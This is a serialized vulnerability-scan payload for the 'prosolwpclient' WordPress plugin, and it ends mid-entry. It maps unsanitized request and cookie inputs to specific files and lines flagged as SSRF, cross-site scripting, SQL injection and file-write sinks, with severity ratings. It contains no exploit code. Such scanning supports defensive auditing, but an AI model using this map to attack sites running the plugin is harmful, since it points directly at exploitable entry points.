523,{"file":567,"line":603,"context":247},525,{"file":567,"line":552,"context":247},{"file":567,"line":606,"context":247},527,{"file":567,"line":608,"context":247},570,{"file":567,"line":610,"context":247},573,{"file":567,"line":612,"context":247},574,{"file":567,"line":614,"context":247},580,{"file":567,"line":614,"context":247},{"file":567,"line":617,"context":247},650,{"file":567,"line":619,"context":247},660,{"file":567,"line":621,"context":247},661,{"file":567,"line":623,"context":247},662,{"file":567,"line":625,"context":247},663,{"file":567,"line":627,"context":247},666,{"file":567,"line":629,"context":247},671,{"file":567,"line":631,"context":247},672,{"file":633,"line":26,"context":247},"public\u002Ftemplates\u002Fprosolwpclientjobsearchform_ori.php",{"file":633,"line":422,"context":247},{"file":633,"line":636,"context":247},146,{"file":633,"line":638,"context":247},173,{"file":633,"line":640,"context":247},175,{"file":633,"line":642,"context":247},187,{"file":633,"line":644,"context":247},217,{"file":633,"line":646,"context":247},240,{"file":633,"line":648,"context":247},241,{"file":633,"line":650,"context":247},252,{"file":633,"line":652,"context":247},265,{"file":633,"line":654,"context":247},332,{"file":633,"line":656,"context":247},337,{"file":633,"line":201,"context":247},{"file":633,"line":659,"context":247},365,{"file":633,"line":661,"context":247},370,{"file":633,"line":663,"context":247},371,{"file":633,"line":665,"context":247},373,{"file":633,"line":667,"context":247},374,{"file":633,"line":669,"context":247},376,{"file":633,"line":671,"context":247},377,{"file":633,"line":673,"context":247},378,{"file":633,"line":675,"context":247},454,{"file":677,"line":280,"context":247},"public\u002Ftemplates\u002Fprosolwpclientjobsearchresult.php",{"file":677,"line":424,"context":247},{"file":677,"line":570,"context":247},{"file":677,"line":228,"context":247},{"file":677,"line":682,"context":247},149,{"file":677,"line":684,"context":247},154,{"file":677,"line":686,"context":247},158,{"file":677,"line":688,"context":247},159,{"file":677,"line":428,"context":247},{"file":677,"line":691,"context":247},178,{"file":677,"line":574,"context":247},{"file":694,"line":695,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fmodals\u002Fprosolwpclientjobapplicationactivitymodal.php",49,{"file":694,"line":697,"context":247},59,{"file":699,"line":695,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fmodals\u002Fprosolwpclientjobapplicationbusinessmodal.php",{"file":699,"line":701,"context":247},60,{"file":703,"line":704,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fmodals\u002Fprosolwpclientjobapplicationjobmodal.php",35,{"file":703,"line":706,"context":247},45,{"file":708,"line":695,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclient-job-application-education-info_main.php",{"file":708,"line":695,"context":247},{"file":708,"line":711,"context":247},76,{"file":708,"line":711,"context":247},{"file":708,"line":714,"context":247},93,{"file":708,"line":714,"context":247},{"file":708,"line":717,"context":247},128,{"file":708,"line":717,"context":247},{"file":708,"line":262,"context":247},{"file":708,"line":262,"context":247},{"file":708,"line":722,"context":247},157,{"file":708,"line":722,"context":247},{"file":708,"line":725,"context":247},233,{"file":708,"line":725,"context":247},{"file":708,"line":728,"context":247},259,{"file":708,"line":728,"context":247},{"file":708,"line":586,"context":247},{"file":708,"line":586,"context":247},{"file":708,"line":733,"context":247},307,{"file":708,"line":733,"context":247},{"file":708,"line":736,"context":247},321,{"file":708,"line":736,"context":247},{"file":708,"line":739,"context":247},335,{"file":708,"line":739,"context":247},{"file":742,"line":743,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclient-job-application-experience-info_bk_25_6_18.php",53,{"file":742,"line":743,"context":247},{"file":742,"line":746,"context":247},69,{"file":742,"line":746,"context":247},{"file":742,"line":749,"context":247},87,{"file":742,"line":749,"context":247},{"file":742,"line":752,"context":247},152,{"file":742,"line":752,"context":247},{"file":742,"line":755,"context":247},167,{"file":742,"line":755,"context":247},{"file":742,"line":574,"context":247},{"file":742,"line":574,"context":247},{"file":742,"line":578,"context":247},{"file":742,"line":578,"context":247},{"file":742,"line":762,"context":247},210,{"file":742,"line":762,"context":247},{"file":742,"line":725,"context":247},{"file":742,"line":725,"context":247},{"file":742,"line":767,"context":247},247,{"file":742,"line":767,"context":247},{"file":742,"line":770,"context":247},264,{"file":742,"line":770,"context":247},{"file":742,"line":773,"context":247},326,{"file":742,"line":773,"context":247},{"file":742,"line":776,"context":247},340,{"file":742,"line":776,"context":247},{"file":742,"line":779,"context":247},354,{"file":742,"line":779,"context":247},{"file":742,"line":782,"context":247},368,{"file":742,"line":782,"context":247},{"file":742,"line":785,"context":247},382,{"file":742,"line":785,"context":247},{"file":788,"line":743,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclient-job-application-experience-info_m.php",{"file":788,"line":743,"context":247},{"file":788,"line":791,"context":247},68,{"file":788,"line":791,"context":247},{"file":788,"line":152,"context":247},{"file":788,"line":152,"context":247},{"file":788,"line":682,"context":247},{"file":788,"line":682,"context":247},{"file":788,"line":798,"context":247},164,{"file":788,"line":798,"context":247},{"file":788,"line":691,"context":247},{"file":788,"line":691,"context":247},{"file":788,"line":803,"context":247},192,{"file":788,"line":803,"context":247},{"file":788,"line":806,"context":247},206,{"file":788,"line":806,"context":247},{"file":788,"line":809,"context":247},300,{"file":788,"line":809,"context":247},{"file":788,"line":812,"context":247},314,{"file":788,"line":812,"context":247},{"file":788,"line":815,"context":247},331,{"file":788,"line":815,"context":247},{"file":788,"line":818,"context":247},393,{"file":788,"line":818,"context":247},{"file":788,"line":821,"context":247},407,{"file":788,"line":821,"context":247},{"file":788,"line":824,"context":247},421,{"file":788,"line":824,"context":247},{"file":788,"line":827,"context":247},435,{"file":788,"line":827,"context":247},{"file":788,"line":830,"context":247},449,{"file":788,"line":830,"context":247},{"file":833,"line":743,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclient-job-application-experience-info_main.php",{"file":833,"line":743,"context":247},{"file":833,"line":746,"context":247},{"file":833,"line":746,"context":247},{"file":833,"line":749,"context":247},{"file":833,"line":749,"context":247},{"file":833,"line":752,"context":247},{"file":833,"line":752,"context":247},{"file":833,"line":755,"context":247},{"file":833,"line":755,"context":247},{"file":833,"line":574,"context":247},{"file":833,"line":574,"context":247},{"file":833,"line":578,"context":247},{"file":833,"line":578,"context":247},{"file":833,"line":762,"context":247},{"file":833,"line":762,"context":247},{"file":833,"line":725,"context":247},{"file":833,"line":725,"context":247},{"file":833,"line":767,"context":247},{"file":833,"line":767,"context":247},{"file":833,"line":770,"context":247},{"file":833,"line":770,"context":247},{"file":833,"line":773,"context":247},{"file":833,"line":773,"context":247},{"file":833,"line":776,"context":247},{"file":833,"line":776,"context":247},{"file":833,"line":779,"context":247},{"file":833,"line":779,"context":247},{"file":833,"line":782,"context":247},{"file":833,"line":782,"context":247},{"file":833,"line":785,"context":247},{"file":833,"line":785,"context":247},{"file":866,"line":743,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclient-job-application-experience-info_mainfile.php",{"file":866,"line":743,"context":247},{"file":866,"line":746,"context":247},{"file":866,"line":746,"context":247},{"file":866,"line":749,"context":247},{"file":866,"line":749,"context":247},{"file":866,"line":752,"context":247},{"file":866,"line":752,"context":247},{"file":866,"line":755,"context":247},{"file":866,"line":755,"context":247},{"file":866,"line":574,"context":247},{"file":866,"line":574,"context":247},{"file":866,"line":578,"context":247},{"file":866,"line":578,"context":247},{"file":866,"line":762,"context":247},{"file":866,"line":762,"context":247},{"file":866,"line":725,"context":247},{"file":866,"line":725,"context":247},{"file":866,"line":767,"context":247},{"file":866,"line":767,"context":247},{"file":866,"line":770,"context":247},{"file":866,"line":770,"context":247},{"file":866,"line":773,"context":247},{"file":866,"line":773,"context":247},{"file":866,"line":776,"context":247},{"file":866,"line":776,"context":247},{"file":866,"line":779,"context":247},{"file":866,"line":779,"context":247},{"file":866,"line":782,"context":247},{"file":866,"line":782,"context":247},{"file":866,"line":785,"context":247},{"file":866,"line":785,"context":247},{"file":899,"line":743,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclient-job-application-experience-info_pratikfile.php",{"file":899,"line":743,"context":247},{"file":899,"line":791,"context":247},{"file":899,"line":791,"context":247},{"file":899,"line":152,"context":247},{"file":899,"line":152,"context":247},{"file":899,"line":682,"context":247},{"file":899,"line":682,"context":247},{"file":899,"line":798,"context":247},{"file":899,"line":798,"context":247},{"file":899,"line":691,"context":247},{"file":899,"line":691,"context":247},{"file":899,"line":803,"context":247},{"file":899,"line":803,"context":247},{"file":899,"line":806,"context":247},{"file":899,"line":806,"context":247},{"file":899,"line":434,"context":247},{"file":899,"line":434,"context":247},{"file":899,"line":918,"context":247},309,{"file":899,"line":918,"context":247},{"file":899,"line":773,"context":247},{"file":899,"line":773,"context":247},{"file":899,"line":923,"context":247},388,{"file":899,"line":923,"context":247},{"file":899,"line":440,"context":247},{"file":899,"line":440,"context":247},{"file":899,"line":928,"context":247},416,{"file":899,"line":928,"context":247},{"file":899,"line":931,"context":247},430,{"file":899,"line":931,"context":247},{"file":899,"line":934,"context":247},444,{"file":899,"line":934,"context":247},{"file":937,"line":697,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclientjobapplicationeducationinfo.php",{"file":937,"line":697,"context":247},{"file":937,"line":80,"context":247},{"file":937,"line":80,"context":247},{"file":937,"line":942,"context":247},107,{"file":937,"line":942,"context":247},{"file":937,"line":945,"context":247},116,{"file":937,"line":947,"context":247},118,{"file":937,"line":949,"context":247},123,{"file":937,"line":951,"context":247},129,{"file":937,"line":953,"context":247},133,{"file":937,"line":955,"context":247},135,{"file":937,"line":957,"context":247},139,{"file":937,"line":957,"context":247},{"file":937,"line":424,"context":247},{"file":937,"line":424,"context":247},{"file":937,"line":428,"context":247},{"file":937,"line":428,"context":247},{"file":937,"line":964,"context":247},166,{"file":937,"line":966,"context":247},168,{"file":937,"line":968,"context":247},172,{"file":937,"line":970,"context":247},176,{"file":937,"line":970,"context":247},{"file":937,"line":973,"context":247},220,{"file":937,"line":975,"context":247},222,{"file":937,"line":580,"context":247},{"file":937,"line":978,"context":247},234,{"file":937,"line":980,"context":247},857,{"file":937,"line":980,"context":247},{"file":937,"line":983,"context":247},889,{"file":937,"line":983,"context":247},{"file":937,"line":986,"context":247},908,{"file":937,"line":986,"context":247},{"file":937,"line":989,"context":247},917,{"file":937,"line":991,"context":247},919,{"file":937,"line":993,"context":247},924,{"file":937,"line":993,"context":247},{"file":937,"line":996,"context":247},929,{"file":937,"line":996,"context":247},{"file":937,"line":999,"context":247},933,{"file":937,"line":1001,"context":247},935,{"file":937,"line":1003,"context":247},939,{"file":937,"line":1003,"context":247},{"file":937,"line":1003,"context":247},{"file":937,"line":1007,"context":247},944,{"file":937,"line":1007,"context":247},{"file":937,"line":1010,"context":247},960,{"file":937,"line":1010,"context":247},{"file":937,"line":1013,"context":247},966,{"file":937,"line":1015,"context":247},968,{"file":937,"line":1017,"context":247},972,{"file":937,"line":1017,"context":247},{"file":937,"line":1020,"context":247},976,{"file":937,"line":1020,"context":247},{"file":937,"line":1023,"context":247},1014,{"file":937,"line":1025,"context":247},1016,{"file":937,"line":1027,"context":247},1020,{"file":937,"line":1027,"context":247},{"file":1030,"line":1031,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclientjobapplicationexperienceinfo.php",52,{"file":1030,"line":1033,"context":247},54,{"file":1030,"line":1035,"context":247},58,{"file":1030,"line":1037,"context":247},62,{"file":1030,"line":1037,"context":247},{"file":1030,"line":1040,"context":247},78,{"file":1030,"line":1040,"context":247},{"file":1030,"line":418,"context":247},{"file":1030,"line":418,"context":247},{"file":1030,"line":945,"context":247},{"file":1030,"line":947,"context":247},{"file":1030,"line":1047,"context":247},122,{"file":1030,"line":1049,"context":247},126,{"file":1030,"line":717,"context":247},{"file":1030,"line":1052,"context":247},132,{"file":1030,"line":1054,"context":247},137,{"file":1030,"line":957,"context":247},{"file":1030,"line":424,"context":247},{"file":1030,"line":1058,"context":247},150,{"file":1030,"line":684,"context":247},{"file":1030,"line":426,"context":247},{"file":1030,"line":428,"context":247},{"file":1030,"line":428,"context":247},{"file":1030,"line":430,"context":247},{"file":1030,"line":430,"context":247},{"file":1030,"line":1066,"context":247},171,{"file":1030,"line":638,"context":247},{"file":1030,"line":1069,"context":247},177,{"file":1030,"line":1071,"context":247},181,{"file":1030,"line":1071,"context":247},{"file":1030,"line":642,"context":247},{"file":1030,"line":1075,"context":247},189,{"file":1030,"line":1077,"context":247},193,{"file":1030,"line":578,"context":247},{"file":1030,"line":578,"context":247},{"file":1030,"line":1081,"context":247},202,{"file":1030,"line":1083,"context":247},204,{"file":1030,"line":1085,"context":247},208,{"file":1030,"line":1087,"context":247},212,{"file":1030,"line":1087,"context":247},{"file":1030,"line":506,"context":247},{"file":1030,"line":973,"context":247},{"file":1030,"line":1092,"context":247},224,{"file":1030,"line":1094,"context":247},228,{"file":1030,"line":1094,"context":247},{"file":1030,"line":512,"context":247},{"file":1030,"line":565,"context":247},{"file":1030,"line":1099,"context":247},552,{"file":1030,"line":455,"context":247},{"file":1030,"line":455,"context":247},{"file":1030,"line":463,"context":247},{"file":1030,"line":463,"context":247},{"file":1030,"line":1105,"context":247},576,{"file":1030,"line":1105,"context":247},{"file":1030,"line":477,"context":247},{"file":1030,"line":477,"context":247},{"file":1030,"line":1110,"context":247},614,{"file":1030,"line":1112,"context":247},616,{"file":1030,"line":485,"context":247},{"file":1030,"line":485,"context":247},{"file":1030,"line":1116,"context":247},624,{"file":1030,"line":1118,"context":247},626,{"file":1030,"line":1120,"context":247},630,{"file":1030,"line":1120,"context":247},{"file":1030,"line":1123,"context":247},635,{"file":1030,"line":491,"context":247},{"file":1030,"line":1126,"context":247},642,{"file":1030,"line":1126,"context":247},{"file":1030,"line":1129,"context":247},648,{"file":1030,"line":1129,"context":247},{"file":1030,"line":1132,"context":247},652,{"file":1030,"line":1134,"context":247},654,{"file":1030,"line":1136,"context":247},658,{"file":1030,"line":1136,"context":247},{"file":1030,"line":1136,"context":247},{"file":1030,"line":625,"context":247},{"file":1030,"line":625,"context":247},{"file":1030,"line":1142,"context":247},669,{"file":1030,"line":629,"context":247},{"file":1030,"line":1145,"context":247},675,{"file":1030,"line":1145,"context":247},{"file":1030,"line":1148,"context":247},679,{"file":1030,"line":1148,"context":247},{"file":1030,"line":1151,"context":247},685,{"file":1030,"line":1153,"context":247},687,{"file":1030,"line":1155,"context":247},691,{"file":1030,"line":1155,"context":247},{"file":1030,"line":1158,"context":247},694,{"file":1030,"line":1158,"context":247},{"file":1030,"line":1161,"context":247},700,{"file":1030,"line":1163,"context":247},702,{"file":1030,"line":1165,"context":247},706,{"file":1030,"line":1165,"context":247},{"file":1030,"line":1168,"context":247},710,{"file":1030,"line":1168,"context":247},{"file":1030,"line":1171,"context":247},716,{"file":1030,"line":1173,"context":247},718,{"file":1030,"line":1175,"context":247},722,{"file":1030,"line":1175,"context":247},{"file":1030,"line":1178,"context":247},726,{"file":1030,"line":1178,"context":247},{"file":1181,"line":711,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclientjobapplicationexpertiseinfo.php",{"file":1181,"line":1183,"context":247},77,{"file":1181,"line":413,"context":247},{"file":1181,"line":1186,"context":247},117,{"file":1181,"line":1186,"context":247},{"file":1181,"line":510,"context":247},{"file":1190,"line":254,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclientjobapplicationothersinfo.php",{"file":1190,"line":1192,"context":247},27,{"file":1190,"line":268,"context":247},{"file":1190,"line":704,"context":247},{"file":1190,"line":704,"context":247},{"file":1190,"line":1197,"context":247},41,{"file":1190,"line":1199,"context":247},43,{"file":1190,"line":1201,"context":247},47,{"file":1190,"line":1031,"context":247},{"file":1190,"line":1033,"context":247},{"file":1190,"line":1035,"context":247},{"file":1206,"line":1207,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclientjobapplicationpersonalinfo.php",84,{"file":1206,"line":411,"context":247},{"file":1206,"line":1210,"context":247},89,{"file":1206,"line":111,"context":247},{"file":1206,"line":67,"context":247},{"file":1206,"line":67,"context":247},{"file":1206,"line":722,"context":247},{"file":1206,"line":722,"context":247},{"file":1206,"line":1217,"context":247},163,{"file":1206,"line":964,"context":247},{"file":1206,"line":1220,"context":247},169,{"file":1206,"line":638,"context":247},{"file":1206,"line":638,"context":247},{"file":1206,"line":1224,"context":247},179,{"file":1206,"line":1071,"context":247},{"file":1206,"line":576,"context":247},{"file":1206,"line":803,"context":247},{"file":1206,"line":1229,"context":247},194,{"file":1206,"line":1231,"context":247},197,{"file":1206,"line":1081,"context":247},{"file":1206,"line":1083,"context":247},{"file":1206,"line":1235,"context":247},207,{"file":1206,"line":1087,"context":247},{"file":1206,"line":1238,"context":247},214,{"file":1206,"line":644,"context":247},{"file":1206,"line":975,"context":247},{"file":1206,"line":1092,"context":247},{"file":1206,"line":1243,"context":247},227,{"file":1206,"line":432,"context":247},{"file":1206,"line":432,"context":247},{"file":1206,"line":512,"context":247},{"file":1206,"line":646,"context":247},{"file":1206,"line":514,"context":247},{"file":1206,"line":1250,"context":247},248,{"file":1206,"line":1250,"context":247},{"file":1206,"line":1253,"context":247},254,{"file":1206,"line":1255,"context":247},256,{"file":1206,"line":1257,"context":247},260,{"file":1206,"line":652,"context":247},{"file":1206,"line":1260,"context":247},269,{"file":1206,"line":1262,"context":247},270,{"file":1206,"line":1264,"context":247},277,{"file":1206,"line":1266,"context":247},279,{"file":1206,"line":1268,"context":247},282,{"file":1206,"line":1270,"context":247},286,{"file":1206,"line":1270,"context":247},{"file":1206,"line":812,"context":247},{"file":1206,"line":1274,"context":247},316,{"file":1206,"line":1276,"context":247},320,{"file":1206,"line":773,"context":247},{"file":1206,"line":1279,"context":247},328,{"file":1206,"line":815,"context":247},{"file":1206,"line":1282,"context":247},339,{"file":1206,"line":1284,"context":247},341,{"file":1206,"line":1286,"context":247},345,{"file":1206,"line":289,"context":247},{"file":1206,"line":289,"context":247},{"file":1206,"line":289,"context":247},{"file":1206,"line":289,"context":247},{"file":1206,"line":1292,"context":247},360,{"file":1206,"line":1292,"context":247},{"file":1206,"line":1292,"context":247},{"file":1206,"line":782,"context":247},{"file":1206,"line":782,"context":247},{"file":1206,"line":782,"context":247},{"file":1206,"line":782,"context":247},{"file":1206,"line":661,"context":247},{"file":1206,"line":661,"context":247},{"file":1206,"line":661,"context":247},{"file":1206,"line":671,"context":247},{"file":1206,"line":671,"context":247},{"file":1206,"line":785,"context":247},{"file":1206,"line":785,"context":247},{"file":1206,"line":291,"context":247},{"file":1206,"line":291,"context":247},{"file":1206,"line":1309,"context":247},397,{"file":1206,"line":1311,"context":247},399,{"file":1206,"line":1311,"context":247},{"file":1206,"line":1314,"context":247},400,{"file":1206,"line":440,"context":247},{"file":1206,"line":440,"context":247},{"file":1206,"line":1318,"context":247},403,{"file":1206,"line":1320,"context":247},426,{"file":1322,"line":268,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclientjobapplicationsidedishesinfo.php",11,[1325],{"name":1326,"version":36,"knownCves":1327},"jQuery",[],[1329,1347,1365,1380,1403,1427,1445,1455,1467,1476,1485,1495,1505,1515,1529,1537,1549,1571],{"entryPoint":1330,"graph":1331,"unsanitizedCount":27,"severity":1346},"proSol_url_validate (admin\u002Fclass-prosolwpclient-admin.php:382)",{"nodes":1332,"edges":1344},[1333,1338],{"id":1334,"type":1335,"label":1336,"file":245,"line":1337},"n0","source","$_POST",384,{"id":1339,"type":1340,"label":1341,"file":245,"line":1342,"wp_function":1343},"n1","sink","wp_remote_get() [SSRF]",394,"wp_remote_get",[1345],{"from":1334,"to":1339,"sanitized":49},"medium",{"entryPoint":1348,"graph":1349,"unsanitizedCount":50,"severity":1346},"proSol_apiActivity (includes\u002Fclass-prosolwpclient-table-helper.php:76)",{"nodes":1350,"edges":1362},[1351,1354,1357,1360],{"id":1334,"type":1335,"label":1352,"file":200,"line":1353},"$_COOKIE",83,{"id":1339,"type":1340,"label":1355,"file":200,"line":420,"wp_function":1356},"wp_remote_post() [SSRF]","wp_remote_post",{"id":1358,"type":1335,"label":1359,"file":200,"line":1353},"n2","$_COOKIE (x2)",{"id":1361,"type":1340,"label":1341,"file":200,"line":957,"wp_function":1343},"n3",[1363,1364],{"from":1334,"to":1339,"sanitized":49},{"from":1358,"to":1361,"sanitized":49},{"entryPoint":1366,"graph":1367,"unsanitizedCount":50,"severity":1346},"proSol_prosolwpclientShortcode (public\u002Fclass-prosolwpclient-public.php:205)",{"nodes":1368,"edges":1377},[1369,1372,1373,1375],{"id":1334,"type":1335,"label":1370,"file":179,"line":1371},"$_GET",219,{"id":1339,"type":1340,"label":1355,"file":179,"line":535,"wp_function":1356},{"id":1358,"type":1335,"label":1374,"file":179,"line":1371},"$_GET (x2)",{"id":1361,"type":1340,"label":1341,"file":179,"line":1376,"wp_function":1343},472,[1378,1379],{"from":1334,"to":1339,"sanitized":49},{"from":1358,"to":1361,"sanitized":49},{"entryPoint":1381,"graph":1382,"unsanitizedCount":1402,"severity":1346},"\u003Cprosolwpclientjobapply> (public\u002Ftemplates\u002Fprosolwpclientjobapply.php:0)",{"nodes":1383,"edges":1398},[1384,1387,1390,1392,1393,1396],{"id":1334,"type":1335,"label":1385,"file":407,"line":1386},"$_GET (x19)",38,{"id":1339,"type":1340,"label":1388,"file":407,"line":408,"wp_function":1389},"echo() [XSS]","echo",{"id":1358,"type":1335,"label":1391,"file":407,"line":1386},"$_GET (x3)",{"id":1361,"type":1340,"label":1341,"file":407,"line":220,"wp_function":1343},{"id":1394,"type":1335,"label":1395,"file":407,"line":489},"n4","$_SERVER['PHP_SELF']",{"id":1397,"type":1340,"label":1388,"file":407,"line":489,"wp_function":1389},"n5",[1399,1400,1401],{"from":1334,"to":1339,"sanitized":49},{"from":1358,"to":1361,"sanitized":49},{"from":1394,"to":1397,"sanitized":49},23,{"entryPoint":1404,"graph":1405,"unsanitizedCount":161,"severity":1346},"\u003Cprosolwpclientjobsearchform> (public\u002Ftemplates\u002Fprosolwpclientjobsearchform.php:0)",{"nodes":1406,"edges":1422},[1407,1409,1411,1413,1414,1416,1417,1420],{"id":1334,"type":1335,"label":1370,"file":567,"line":1408},26,{"id":1339,"type":1340,"label":1341,"file":567,"line":1410,"wp_function":1343},73,{"id":1358,"type":1335,"label":1412,"file":567,"line":1408},"$_GET (x7)",{"id":1361,"type":1340,"label":1388,"file":567,"line":570,"wp_function":1389},{"id":1394,"type":1335,"label":1415,"file":567,"line":597},"$_POST['jobname']",{"id":1397,"type":1340,"label":1388,"file":567,"line":597,"wp_function":1389},{"id":1418,"type":1335,"label":1419,"file":567,"line":601},"n6","$_POST['searchplace']",{"id":1421,"type":1340,"label":1388,"file":567,"line":601,"wp_function":1389},"n7",[1423,1424,1425,1426],{"from":1334,"to":1339,"sanitized":49},{"from":1358,"to":1361,"sanitized":49},{"from":1394,"to":1397,"sanitized":49},{"from":1418,"to":1421,"sanitized":49},{"entryPoint":1428,"graph":1429,"unsanitizedCount":143,"severity":1346},"\u003Cprosolwpclientjobsearchform_ori> (public\u002Ftemplates\u002Fprosolwpclientjobsearchform_ori.php:0)",{"nodes":1430,"edges":1440},[1431,1432,1434,1435,1436,1437,1438,1439],{"id":1334,"type":1335,"label":1370,"file":633,"line":254},{"id":1339,"type":1340,"label":1341,"file":633,"line":1433,"wp_function":1343},66,{"id":1358,"type":1335,"label":1391,"file":633,"line":254},{"id":1361,"type":1340,"label":1388,"file":633,"line":422,"wp_function":1389},{"id":1394,"type":1335,"label":1415,"file":633,"line":663},{"id":1397,"type":1340,"label":1388,"file":633,"line":663,"wp_function":1389},{"id":1418,"type":1335,"label":1419,"file":633,"line":667},{"id":1421,"type":1340,"label":1388,"file":633,"line":667,"wp_function":1389},[1441,1442,1443,1444],{"from":1334,"to":1339,"sanitized":49},{"from":1358,"to":1361,"sanitized":49},{"from":1394,"to":1397,"sanitized":49},{"from":1418,"to":1421,"sanitized":49},{"entryPoint":1446,"graph":1447,"unsanitizedCount":13,"severity":1454},"proSol_ajaxClearlog (admin\u002Fclass-prosolwpclient-admin.php:345)",{"nodes":1448,"edges":1452},[1449,1451],{"id":1334,"type":1335,"label":1336,"file":245,"line":1450},349,{"id":1339,"type":1340,"label":1388,"file":245,"line":249,"wp_function":1389},[1453],{"from":1334,"to":1339,"sanitized":65},"low",{"entryPoint":1456,"graph":1457,"unsanitizedCount":13,"severity":1454},"\u003Cclass-prosolwpclient-admin> (admin\u002Fclass-prosolwpclient-admin.php:0)",{"nodes":1458,"edges":1464},[1459,1461,1462,1463],{"id":1334,"type":1335,"label":1460,"file":245,"line":1450},"$_POST (x2)",{"id":1339,"type":1340,"label":1388,"file":245,"line":249,"wp_function":1389},{"id":1358,"type":1335,"label":1336,"file":245,"line":1337},{"id":1361,"type":1340,"label":1341,"file":245,"line":1342,"wp_function":1343},[1465,1466],{"from":1334,"to":1339,"sanitized":65},{"from":1358,"to":1361,"sanitized":65},{"entryPoint":1468,"graph":1469,"unsanitizedCount":13,"severity":1454},"\u003Cadmin-overview> (admin\u002Ftemplates\u002Fadmin-overview.php:0)",{"nodes":1470,"edges":1474},[1471,1473],{"id":1334,"type":1335,"label":1472,"file":253,"line":262},"$_SERVER['REQUEST_URI'] (x2)",{"id":1339,"type":1340,"label":1388,"file":253,"line":262,"wp_function":1389},[1475],{"from":1334,"to":1339,"sanitized":65},{"entryPoint":1477,"graph":1478,"unsanitizedCount":27,"severity":1454},"\u003Cadmin-view-single-table-list> (admin\u002Ftemplates\u002Fadmin-view-single-table-list.php:0)",{"nodes":1479,"edges":1483},[1480,1482],{"id":1334,"type":1335,"label":1481,"file":272,"line":152},"$_REQUEST['page']",{"id":1339,"type":1340,"label":1388,"file":272,"line":152,"wp_function":1389},[1484],{"from":1334,"to":1339,"sanitized":49},{"entryPoint":1486,"graph":1487,"unsanitizedCount":13,"severity":1454},"proSol_prosolwpclientFrontendFormsubmit (public\u002Fclass-prosolwpclient-public.php:529)",{"nodes":1488,"edges":1493},[1489,1491],{"id":1334,"type":1335,"label":1370,"file":179,"line":1490},535,{"id":1339,"type":1340,"label":1355,"file":179,"line":1492,"wp_function":1356},680,[1494],{"from":1334,"to":1339,"sanitized":65},{"entryPoint":1496,"graph":1497,"unsanitizedCount":13,"severity":1454},"proSol_goupDataIdCallback (public\u002Fclass-prosolwpclient-public.php:801)",{"nodes":1498,"edges":1503},[1499,1502],{"id":1334,"type":1335,"label":1500,"file":179,"line":1501},"$_REQUEST (x2)",806,{"id":1339,"type":1340,"label":1388,"file":179,"line":364,"wp_function":1389},[1504],{"from":1334,"to":1339,"sanitized":65},{"entryPoint":1506,"graph":1507,"unsanitizedCount":13,"severity":1454},"proSol_applicationSubmitProcess (public\u002Fclass-prosolwpclient-public.php:1266)",{"nodes":1508,"edges":1513},[1509,1511],{"id":1334,"type":1335,"label":1370,"file":179,"line":1510},1270,{"id":1339,"type":1340,"label":1355,"file":179,"line":1512,"wp_function":1356},2035,[1514],{"from":1334,"to":1339,"sanitized":65},{"entryPoint":1516,"graph":1517,"unsanitizedCount":13,"severity":1454},"\u003Cclass-prosolwpclient-public> (public\u002Fclass-prosolwpclient-public.php:0)",{"nodes":1518,"edges":1525},[1519,1520,1521,1522,1523,1524],{"id":1334,"type":1335,"label":1391,"file":179,"line":1371},{"id":1339,"type":1340,"label":1355,"file":179,"line":535,"wp_function":1356},{"id":1358,"type":1335,"label":1374,"file":179,"line":1371},{"id":1361,"type":1340,"label":1341,"file":179,"line":1376,"wp_function":1343},{"id":1394,"type":1335,"label":1500,"file":179,"line":1501},{"id":1397,"type":1340,"label":1388,"file":179,"line":364,"wp_function":1389},[1526,1527,1528],{"from":1334,"to":1339,"sanitized":65},{"from":1358,"to":1361,"sanitized":65},{"from":1394,"to":1397,"sanitized":65},{"entryPoint":1530,"graph":1531,"unsanitizedCount":27,"severity":1454},"\u003Cprosolwpclientjobapplicationexpertiseinfo> (public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclientjobapplicationexpertiseinfo.php:0)",{"nodes":1532,"edges":1535},[1533,1534],{"id":1334,"type":1335,"label":1370,"file":1181,"line":161},{"id":1339,"type":1340,"label":1388,"file":1181,"line":510,"wp_function":1389},[1536],{"from":1334,"to":1339,"sanitized":49},{"entryPoint":1538,"graph":1539,"unsanitizedCount":27,"severity":1548},"proSol_allTablesInsertion (includes\u002Fclass-prosolwpclient-table-helper.php:368)",{"nodes":1540,"edges":1546},[1541,1542],{"id":1334,"type":1335,"label":1352,"file":200,"line":671},{"id":1339,"type":1340,"label":1543,"file":200,"line":1544,"wp_function":1545},"get_var() [SQLi]",392,"get_var",[1547],{"from":1334,"to":1339,"sanitized":49},"high",{"entryPoint":1550,"graph":1551,"unsanitizedCount":1570,"severity":1548},"\u003Cclass-prosolwpclient-table-helper> (includes\u002Fclass-prosolwpclient-table-helper.php:0)",{"nodes":1552,"edges":1565},[1553,1554,1555,1557,1558,1559,1560,1561],{"id":1334,"type":1335,"label":1359,"file":200,"line":1353},{"id":1339,"type":1340,"label":1355,"file":200,"line":420,"wp_function":1356},{"id":1358,"type":1335,"label":1556,"file":200,"line":1353},"$_COOKIE (x3)",{"id":1361,"type":1340,"label":1341,"file":200,"line":957,"wp_function":1343},{"id":1394,"type":1335,"label":1352,"file":200,"line":671},{"id":1397,"type":1340,"label":1543,"file":200,"line":1544,"wp_function":1545},{"id":1418,"type":1335,"label":1352,"file":200,"line":1353},{"id":1421,"type":1340,"label":1562,"file":200,"line":1563,"wp_function":1564},"file_put_contents() [File 